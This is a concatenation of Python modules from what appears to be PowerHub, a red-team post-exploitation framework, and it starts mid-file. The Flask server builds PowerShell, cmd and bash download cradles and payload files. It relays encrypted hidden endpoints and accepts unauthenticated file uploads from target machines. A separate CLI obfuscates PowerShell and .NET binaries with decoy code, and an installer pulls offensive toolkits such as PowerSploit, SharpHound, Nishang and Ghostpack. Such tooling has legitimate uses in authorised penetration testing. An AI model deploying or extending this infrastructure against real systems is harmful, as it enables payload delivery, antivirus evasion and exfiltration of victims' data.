)

parser.add_argument(
    '--uri-path', dest="URI_PATH", type=str,
    default='',
    help="the URI path where the target can reach the server (default: '')"
)


def parse_args(argv=None):
    args = parser.parse_args(argv)

    if ((args.SSL_KEY and not args.SSL_CERT)
            or (args.SSL_CERT and not args.SSL_KEY)):
        print("If you supply one of SSL_CERT or SSL_KEY you must also supply "
              "the other")
        exit(1)

    if args.ALLOWLIST:
        args.ALLOWLIST = args.ALLOWLIST.split(',')

    if args.SSL_KEY:
        args.PROTOCOL = 'https'
    else:
        args.PROTOCOL = 'http'
    return args



from base64 import urlsafe_b64decode
import binascii
from datetime import datetime
from functools import wraps
import logging
import os
import shutil
from tempfile import TemporaryDirectory

import flask.cli
from flask import Blueprint, render_template, request, Response, redirect, \
         send_from_directory, flash, abort, make_response

from powerhub.sql import get_clip_entry_list
from powerhub.stager import build_cradle
import powerhub.modules as phmod
from powerhub.upload import save_file, get_filelist
from powerhub.directories import directories
from powerhub.payloads import create_payload
from powerhub.tools import decrypt_aes
from powerhub.repos import repositories, install_repo
from powerhub.hiddenapp import hidden_app
from powerhub.dhkex import DH_ENDPOINT, dh_kex
from powerhub.parameters import param_collection


# Disable startup banner
flask.cli.show_server_banner = lambda *args: None

app = Blueprint('app', __name__)
log = logging.getLogger(__name__)

if log.getEffectiveLevel() <= logging.DEBUG:
    logging.getLogger("socketio").setLevel(logging.WARN)
    logging.getLogger("engineio").setLevel(logging.WARN)


def check_auth(username, password):
    """This function is called to check if a username /
    password combination is valid.
    """
    if app.args.AUTH:
        if ':' in app.args.AUTH:
            user, pwd = app.args.AUTH.split(':')[:2]
        else:
            user, pwd = app.args.AUTH, ''
        return username == user and password == pwd
    else:
        return True


def authenticate():
    """Sends a 401 response that enables basic auth"""
    return Response('Could not verify your access level for that URL.\n'
                    'You have to login with proper credentials',
                    401,
                    {'WWW-Authenticate': 'Basic realm="Login Required"'})


def requires_auth(f):
    @wraps(f)
    def decorated(*largs, **kwargs):
        auth = request.authorization
        if app.args.AUTH and (not auth or not check_auth(auth.username, auth.password)):
            return authenticate()
        return f(*largs, **kwargs)
    return decorated


def push_notification(msg):
    """Trigger a toast or an action on all windows

    :msg: A dict either with keys [title, subtitle, body, category] or
    [action, location]
    """
    app.socketio.emit(
        'push',
        msg,
        namespace="/push-notifications",
    )


@app.route('/css/<path:path>')
def send_css(path):
    return send_from_directory(os.path.join('static', 'css'), path)


@app.route('/js/<path:path>')
def send_js(path):
    return send_from_directory(os.path.join('static', 'js'), path)


@app.route('/', defaults={'path': ''})
@app.route('/<path:path>', methods=['POST', 'GET'])
def catch_all(path):
    # Check if requests comes from a browser
    if not path:
        if 'text/html' in request.headers.get('Accept', ''):
            # Probably from Browser
            return redirect("/hub")
        else:
            # Probably from PowerShell
            return hidden_app.test_client().get('/')

    if path.startswith(DH_ENDPOINT):
        try:
            public_key = int(path.split('/')[1])
        except (IndexError, ValueError):
            abort(404)
        response = ' '.join(dh_kex(public_key, app.key))
        return Response(response, content_type='text/plain; charset=utf-8')

    # Return hidden endpoint
    try:
        # If path is of the form `<b64 string>/<n>`, then separate the `n`
        # That's the increment for incremental delivery
        if '/' in path:
            path, increment = path.split('/')[:2]
        else:
            increment = None
        path = urlsafe_b64decode(path)
        path = decrypt_aes(path, app.key).decode()
        if increment:
            path += '&increment=%s' % increment
        log.info("Forwarding hidden endpoint: %s" % path)
        return hidden_app.test_client().get('/'+path)
    except (binascii.Error, ValueError):
        abort(404)


# === Tab: Hub ==============================================


@app.route('/hub')
@requires_auth
def hub():
    clip_entries = [('-1', 'None')] + get_clip_entry_list(app.clipboard)
    param_collection.update_options('clip-exec', clip_entries)
    return render_template("html/hub.html", parameters=param_collection.parameters)


@app.route('/dlcradle')
@requires_auth
def dlcradle():
    """Return the download cradle as HTML fragment"""
    param_collection.parse_get_args(request.args)
    params = param_collection

    if params['launcher'] in [
        'powershell',
        'cmd',
        'cmd_enc',
        'bash',
    ]:
        cmd = build_cradle(params, app.key, app.callback_urls)
        href = None
    else:
        # Return a download button for payload
        import urllib
        href = urllib.parse.urlencode(request.args)
        href = '/dl?' + href
        cmd = None

    return render_template(
        "html/hub/download-cradle.html",
        dl_str=cmd,
        href=href,
    )


@app.route('/dl')
@requires_auth
def download_cradle():
    """Download payload as a file cradle"""
    try:
        param_collection.parse_get_args_short(request.args)
        filename, binary = create_payload(param_collection, app.key, app.callback_urls)
        response = make_response(binary)

        response.headers.set('Content-Type', 'application/octet-stream')
        response.headers.set(
            'Content-Disposition',
            'attachment',
            filename=filename,
        )
        return response
    except Exception as e:
        msg = {
            'title': 'An error occurred',
            'body': str(e),
            'category': 'danger',
        }
        flash(msg)
        log.exception(e)
        return redirect('/hub')


# === Tab: Modules ==============================================


@app.route('/modules')
@requires_auth
def modules():
    context = {
        "modules": phmod.modules,
        "repositories": list(repositories.keys()),
    }
    return render_template("html/modules.html", **context)


# === Tab: Clipboard ==============================================


@app.route('/clipboard')
@requires_auth
def clipboard():
    entries = list(app.clipboard.entries.values())
    context = {
        "clipboard": entries,
    }
    return render_template("html/clipboard.html", **context)


@app.route('/clipboard/add', methods=["POST"])
@requires_auth
def add_clipboard():
    """Add a clipboard entry"""
    content = request.form.get("content")
    app.clipboard.add(
        content,
        str(datetime.utcnow()).split('.')[0],
        request.remote_addr
    )
    push_notification({'action': 'reload', 'location': 'clipboard'})
    return redirect('/clipboard')


@app.route('/clipboard/delete', methods=["POST"])
@requires_auth
def del_clipboard():
    """Delete a clipboard entry"""
    id = int(request.form.get("id"))
    app.clipboard.delete(id)
    return ""


@app.route('/clipboard/executable', methods=["POST"])
@requires_auth
def executable_clipboard():
    """Set executable flag of a clipboard entry"""
    id = int(request.form.get("id"))
    value = (request.form.get("value") == 'true')
    app.clipboard.set_executable(id, value)
    return ""


@app.route('/clipboard/edit', methods=["POST"])
@requires_auth
def edit_clipboard():
    """Edit a clipboard entry"""
    id = int(request.form.get("id"))
    content = request.form.get("content")
    app.clipboard.edit(id, content)
    return ""


@app.route('/clipboard/del-all', methods=["POST"])
@requires_auth
def del_all_clipboard():
    """Delete all clipboard entries"""
    for id in list(app.clipboard.entries.keys()):
        app.clipboard.delete(id)
    return redirect("/clipboard")


@app.route('/clipboard/export', methods=["GET"])
@requires_auth
def export_clipboard():
    """Export all clipboard entries"""
    result = ""
    for e in list(app.clipboard.entries.values()):
        headline = "%s (%s)\r\n" % (e.time, e.IP)
        result += headline
        result += "="*(len(headline)-2) + "\r\n"
        result += e.content + "\r\n"*2
    return Response(result, content_type='text/plain; charset=utf-8')


# === Tab: File Exchange ==============================================


@app.route('/fileexchange')
@requires_auth
def fileexchange():
    context = {
        "files": get_filelist(),
    }
    return render_template("html/fileexchange.html", **context)


def process_file(file, is_from_script, remote_addr):
    """Save the file and return a message for push notification"""
    log.info("File received from %s: %s" % (remote_addr, file.filename))
    key = None
    if is_from_script:
        key = app.key
    save_file(file, key=key)
    msg = {}
    return msg


@app.route('/upload', methods=["POST"])
def upload():
    """Upload one or more files"""
    file_list = request.files.getlist("file[]")
    is_from_script = "script" in request.args
    remote_addr = request.remote_addr
    msg = {}
    for file in file_list:
        if file.filename == '':
            return redirect(request.url)
        if file:
            msg = process_file(file, is_from_script, remote_addr)
    push_notification({'action': 'reload', 'location': 'fileexchange'})
    if is_from_script:
        if msg:
            push_notification(msg)
        return ('OK', 200)
    else:
        return redirect('/fileexchange')


@app.route('/d/<path:filename>')
@requires_auth
def download_file(filename):
    """Download a file"""
    try:
        return send_from_directory(
            directories.UPLOAD_DIR,
            filename,
            as_attachment='dl' in request.args,
        )
    except PermissionError:
        abort(403)


@app.route('/d-all')
@requires_auth
def download_all():
    """Download archive of all uploaded files"""
    tmp_dir = TemporaryDirectory()
    file_name = "powerhub_upload_export_" + \
                datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
    shutil.make_archive(os.path.join(tmp_dir.name, file_name),
                        "zip",
                        directories.UPLOAD_DIR)
    return send_from_directory(tmp_dir.name,
                               file_name + ".zip",
                               as_attachment=True)


# === Tab: Modules =================================================


@app.route('/getrepo', methods=["POST"])
@requires_auth
def get_repo():
    """Download a specified repository"""
    try:
        install_repo(
            request.form['repo'],
            request.form['custom-repo']
        )
        msg = {
            'title': "Success",
            'body': "%s has been installed" % request.form['repo'],
            'category': 'success',
        }
    except Exception as e:
        log.exception(e)
        msg = {
            'title': "Error",
            'body': str(e),
            'category': 'danger',
        }
    flash(msg, '')
    return redirect('/modules')


# === Tab: Static =================================================


@app.route('/list-static')
@requires_auth
def list_static():
    def get_dir(dir_name):
        directory = {
            'name': os.path.basename(dir_name),
            'files': [],
            'subdirs': [],
        }
        with os.scandir(dir_name) as it:
            for x in it:
                if x.is_file():
                    directory['files'].append(x.name)
                if x.is_dir():
                    subdir = get_dir(os.path.join(dir_name, x.name))
                    directory['subdirs'].append(subdir)
        directory['files'].sort()
        directory['subdirs'].sort(key=lambda x: x['name'])
        return directory
    context = {
        'rootdir': get_dir(directories.STATIC_DIR)
    }
    return render_template('html/list-static.html', **context)


@app.route('/static/<path:filename>')
def server_static(filename):
    try:
        return send_from_directory(directories.STATIC_DIR,
                                   filename,
                                   as_attachment=False)
    except PermissionError:
        abort(403)



import argparse
from powerhub import __version__

parser = argparse.ArgumentParser(
    description="Leverage PowerHub's obfuscation mechanism to obfuscate"
    " PowerShell scripts and .NET binaries"
)

parser.add_argument(
    '-v', '--version', action='version', version=__version__
)

parser.add_argument(
    '-d', '--debug', default=False, action="store_true",
    help=("enable debug mode (disables a lot of obfuscation)"),
)

parser.add_argument(
    '-i', '--input',
    default='-',
    type=argparse.FileType(mode='rb'),
    help="path to input file (default: stdin)",
)

parser.add_argument(
    '-N', '--name',
    default=None,
    help="for .NET binaries: determine a function name with which to call the code"
         " (default: the filename, or a random name when reading from stdin",
)

parser.add_argument(
    '-o', '--output',
    default='-',
    type=argparse.FileType(mode='w'),
    help="path to output file (default: stdin)",
)

parser.add_argument(
    '-e', '--epilogue',
    default=None,
    help="PowerShell code to execute after all scripts have been loaded",
)

parser.add_argument(
    '-n', '--natural', default=False, action="store_true",
    help=("use natural variable names"),
)

parser.add_argument(
    '-y', '--decoy', default=False, action="store_true",
    help=("include decoy code"),
)

parser.add_argument(
    '-s', '--slow-encryption', default=False, action="store_true",
    help=("avoid system routines for fast encryption"),
)


def parse_args():
    return parser.parse_args()



import logging
import sys


class FlaskFilter(logging.Filter):
    """This removes a misleading logging message by Flask"""

    def filter(self, record):
        return "* Running on http://" not in record.getMessage()


def init_logging(debug, stream=sys.stdout):
    if debug:
        FORMAT = '%(levelname).1s %(asctime)-15s '
        FORMAT += '%(filename)s:%(lineno)d %(message)s'
    else:
        FORMAT = '%(levelname).1s %(asctime)-15s %(message)s'

    logging.basicConfig(
        stream=stream,
        level=logging.DEBUG if debug else logging.INFO,
        format=FORMAT,
        datefmt="%Y-%m-%d %H:%M:%S",
    )

    for h in logging.root.handlers:
        h.addFilter(FlaskFilter())



import subprocess
import os
import urllib.request
from urllib.parse import urlparse
from powerhub.directories import directories

repositories = {
    "AdrianVollmer/PowerSploit": "https://github.com/AdrianVollmer/PowerSploit.git",
    "SharpHound.exe": "https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.exe",  # noqa
    "SharpHound.ps1": "https://github.com/BloodHoundAD/BloodHound/raw/master/Collectors/SharpHound.ps1",  # noqa
    "ASREPRoast.ps1": "https://raw.githubusercontent.com/HarmJ0y/ASREPRoast/master/ASREPRoast.ps1",
    "samratashok/Nishang": "https://github.com/samratashok/nishang.git",
    "S3cur3Th1sSh1t/PowerSharpPack": "https://github.com/S3cur3Th1sSh1t/PowerSharpPack",
    "r3motecontrol/Ghostpack Binaries": "https://github.com/r3motecontrol/Ghostpack-CompiledBinaries",  # noqa
}


def install_repo(repo, custom_repo=None):
    """Download a repository; custom repositories have precedence"""
    if custom_repo:
        return install_repo_from_url(custom_repo)
    else:
        return install_repo_from_url(repositories[repo])


def install_repo_from_url(url):
    """Determine the type of a module and install it accordingly"""
    parsed_url = urlparse(url)
    basename = os.path.basename(parsed_url.path)
    if basename.endswith('.git'):
        return git_clone(url)
    elif basename.endswith('.ps1') or basename.endswith('.exe'):
        return download(url)
    else:
        raise Exception("Unknown extension: %s" % url)


def git_clone(url):
    """Installs a git repository"""
    dest_dir = directories.MOD_DIR
    if os.path.isdir(dest_dir):
        raise Exception("Directory already exists: %s" % dest_dir)
    subprocess.check_output(['git', 'clone', '--depth', '1', url, dest_dir],
                            stderr=subprocess.STDOUT)


def download(url):
    """Downloads a module that is not a git repository"""
    parsed_url = urlparse(url)
    basename = os.path.basename(parsed_url.path)
    response = urllib.request.urlopen(url)
    data = response.read()
    filename = os.path.join(directories.MOD_DIR, basename)
    if os.path.isfile(filename):
        raise Exception("File already exists: %s" % filename)
    with open(filename, 'wb') as f:
        f.write(data)
